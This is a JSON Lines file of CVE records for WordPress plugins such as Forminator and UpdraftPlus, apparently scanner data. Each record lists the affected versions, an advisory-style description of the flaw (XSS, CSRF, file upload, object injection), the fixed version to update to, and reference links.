{"CVE_ID":"CVE-2023-5119","slug":"forminator","versionImpact":"1.26.0","versionEndExcluding":"1.27.0","description":"The Forminator WordPress plugin before 1.27.0 does not properly sanitize the redirect-url field in the form submission settings, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.27.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229207bb-8f8d-4579-a8e2-54516474ccb4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229207bb-8f8d-4579-a8e2-54516474ccb4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1288","slug":"schema-and-structured-data-for-wp","versionImpact":"1.26","versionEndExcluding":"1.27","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saswp_reviews_form_render' function in all versions up to, and including, 1.26. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's stored reCaptcha site and secret keys, potentially breaking the reCaptcha functionality.","recommendation":"Update to version 1.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/reviews\\\/reviews_form.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/reviews\\\/reviews_form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4734","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.6.1","versionEndExcluding":"1.26.7","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.26.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca168f-a383-42fc-91ba-d78a5d7e6724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca168f-a383-42fc-91ba-d78a5d7e6724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4656","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.6.1","versionEndExcluding":"1.26.7","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user agent header in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af742451-b2d6-445a-9a10-e950490f6c7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af742451-b2d6-445a-9a10-e950490f6c7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1050","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.5","versionEndExcluding":"1.26.6","description":"The Import and export users and customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_force_reset_password_delete_metas() function in all versions up to, and including, 1.26.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete all forced password resets.","recommendation":"Update to version 1.26.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2fbd599-0a6c-4182-87d9-ad7cf3fb5865?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2fbd599-0a6c-4182-87d9-ad7cf3fb5865?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-users-from-csv-with-meta\\\/trunk\\\/classes\\\/force-reset-password.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-users-from-csv-with-meta\\\/trunk\\\/classes\\\/force-reset-password.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077276%40import-users-from-csv-with-meta&new=3077276%40import-users-from-csv-with-meta&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077276%40import-users-from-csv-with-meta&new=3077276%40import-users-from-csv-with-meta&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4400","slug":"post-and-page-builder","versionImpact":"1.26.4","versionEndExcluding":"1.26.5","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 1.26.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bb6683a-b8e6-4776-880f-5b48966fc5c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bb6683a-b8e6-4776-880f-5b48966fc5c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087230\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10054","slug":"happyforms","versionImpact":"1.26.2","versionEndExcluding":"1.26.3","description":"The Happyforms WordPress plugin before 1.26.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.26.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a9fd64b-3207-4acb-92ff-1cca08c41ac9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a9fd64b-3207-4acb-92ff-1cca08c41ac9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12034","slug":"advanced-google-recaptcha","versionImpact":"1.25","versionEndExcluding":"1.26","description":"The Advanced Google reCAPTCHA plugin for WordPress is vulnerable to IP unblocking in all versions up to, and including, 1.25. This is due to the plugin not utilizing a strong unique key when generating an unblock request. This makes it possible for unauthenticated attackers to unblock their IP after being locked out due to too many bad password attempts.","recommendation":"Update to version 1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208704%40advanced-google-recaptcha&new=3208704%40advanced-google-recaptcha&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208704%40advanced-google-recaptcha&new=3208704%40advanced-google-recaptcha&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa7e6f6-92b2-494b-8c7a-76ba8213b610?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa7e6f6-92b2-494b-8c7a-76ba8213b610?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1447","slug":"sydney-toolbox","versionImpact":"1.25","versionEndExcluding":"1.26","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aThemes Slider button element in all versions up to, and including, 1.25 due to insufficient input sanitization and output escaping on user supplied link. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L692\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L692\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0215","slug":"updraftplus","versionImpact":"1.24.12","versionEndExcluding":"1.25.1","description":"The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the showdata and initiate_restore parameters in all versions up to, and including, 1.24.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an admin user into performing an action such as clicking on a link.","recommendation":"Update to version 1.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4404\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4404\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4439\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af568eea-59ce-467e-ba03-625d04d3db6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af568eea-59ce-467e-ba03-625d04d3db6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4596","slug":"forminator","versionEndExcluding":"1.25.0","description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51664\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51664\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954409\\\/forminator\\\/trunk\\\/library\\\/fields\\\/postdata.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954409\\\/forminator\\\/trunk\\\/library\\\/fields\\\/postdata.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3134","slug":"forminator","versionEndExcluding":"1.24.4","description":"The Forminator WordPress plugin before 1.24.4 does not properly escape values that are being reflected inside form fields that use pre-populated query parameters, which could lead to reflected XSS attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d50d3cc-7563-42c4-977b-f834fee711da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d50d3cc-7563-42c4-977b-f834fee711da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6624","slug":"import-users-from-csv-with-meta","versionImpact":"1.24.3","versionEndExcluding":"1.24.4","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.24.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4731eb39-8c01-4a2b-80f7-15d8c13a19b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4731eb39-8c01-4a2b-80f7-15d8c13a19b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007926%40import-users-from-csv-with-meta%2Ftrunk&old=3007057%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007926%40import-users-from-csv-with-meta%2Ftrunk&old=3007057%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6583","slug":"import-users-from-csv-with-meta","versionImpact":"1.24.2","versionEndExcluding":"1.24.3","description":"The Import and export users and customers plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.24.2 via the Recurring Import functionality. This makes it possible for authenticated attackers, with administrator access and above, to read and delete the contents of arbitrary files on the server including wp-config.php, which can contain sensitive information.","recommendation":"Update to version 1.24.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac709779-36f1-4f66-8db3-95a514a5ea59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac709779-36f1-4f66-8db3-95a514a5ea59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007057\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007057\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10957","slug":"updraftplus","versionImpact":"1.24.11","versionEndExcluding":"1.24.12","description":"The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.24.11 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.","recommendation":"Update to version 1.24.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/trunk\\\/includes\\\/class-search-replace.php#L411\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/trunk\\\/includes\\\/class-search-replace.php#L411\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212299\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212299\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4729ed37-96b2-4717-8a72-89b9a21ec058?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4729ed37-96b2-4717-8a72-89b9a21ec058?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2010","slug":"forminator","versionEndExcluding":"1.24.1","description":"The Forminator WordPress plugin before 1.24.1 does not use an atomic operation to check whether a user has already voted, and then update that information. This leads to a Race Condition that may allow a single user to vote multiple times on a poll.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d0da4c0d-622f-4310-a867-6bfdb474073a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d0da4c0d-622f-4310-a867-6bfdb474073a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5135","slug":"simple-cloudflare-turnstile","versionImpact":"1.23.1","versionEndExcluding":"1.23.2","description":"The Simple Cloudflare Turnstile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'gravity-simple-turnstile' shortcode in versions up to, and including, 1.23.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.23.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f6c9d3-641d-42f7-bf11-e3c3a44eeb76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f6c9d3-641d-42f7-bf11-e3c3a44eeb76?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/simple-cloudflare-turnstile.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/simple-cloudflare-turnstile.php#L72\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L23\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970368\\\/simple-cloudflare-turnstile#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970368\\\/simple-cloudflare-turnstile#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5660","slug":"sendpress","versionImpact":"1.22.3.31","versionEndExcluding":"1.23.11.6","description":"The SendPress Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.22.3.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.23.11.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbce42a0-29a7-40df-973c-1fe7338f6c94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbce42a0-29a7-40df-973c-1fe7338f6c94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpress\\\/tags\\\/1.22.3.31\\\/classes\\\/sc\\\/class-sendpress-sc-unsubscribe-form.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpress\\\/tags\\\/1.22.3.31\\\/classes\\\/sc\\\/class-sendpress-sc-unsubscribe-form.php#L57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5982","slug":"updraftplus","versionImpact":"1.23.10","versionEndExcluding":"1.23.11","description":"The UpdraftPlus: WordPress Backup & Migration Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23.10. This is due to a lack of nonce validation and insufficient validation of the instance_id on the 'updraftmethod-googledrive-auth' action used to update Google Drive remote storage location. This makes it possible for unauthenticated attackers to modify the Google Drive location that backups are sent to via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can make it possible for attackers to receive backups for a site which may contain sensitive information.","recommendation":"Update to version 1.23.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1be11c5-0a44-4816-b6bf-d330cb51dbf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1be11c5-0a44-4816-b6bf-d330cb51dbf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989669\\\/updraftplus\\\/tags\\\/1.23.11\\\/class-updraftplus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989669\\\/updraftplus\\\/tags\\\/1.23.11\\\/class-updraftplus.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13897","slug":"moving-media-library","versionImpact":"1.22","versionEndExcluding":"1.23","description":"The Moving Media Library plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the generate_json_page function in all versions up to, and including, 1.22. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244709\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244709\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/815ce00b-3753-4c38-8a30-5242a5841734?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/815ce00b-3753-4c38-8a30-5242a5841734?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8856","slug":"wp-time-capsule","versionImpact":"1.22.21","versionEndExcluding":"1.22.22","description":"The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.22.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-capsule\\\/trunk\\\/wp-tcapsule-bridge\\\/upload\\\/php\\\/UploadHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-capsule\\\/trunk\\\/wp-tcapsule-bridge\\\/upload\\\/php\\\/UploadHandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188325\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188325\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
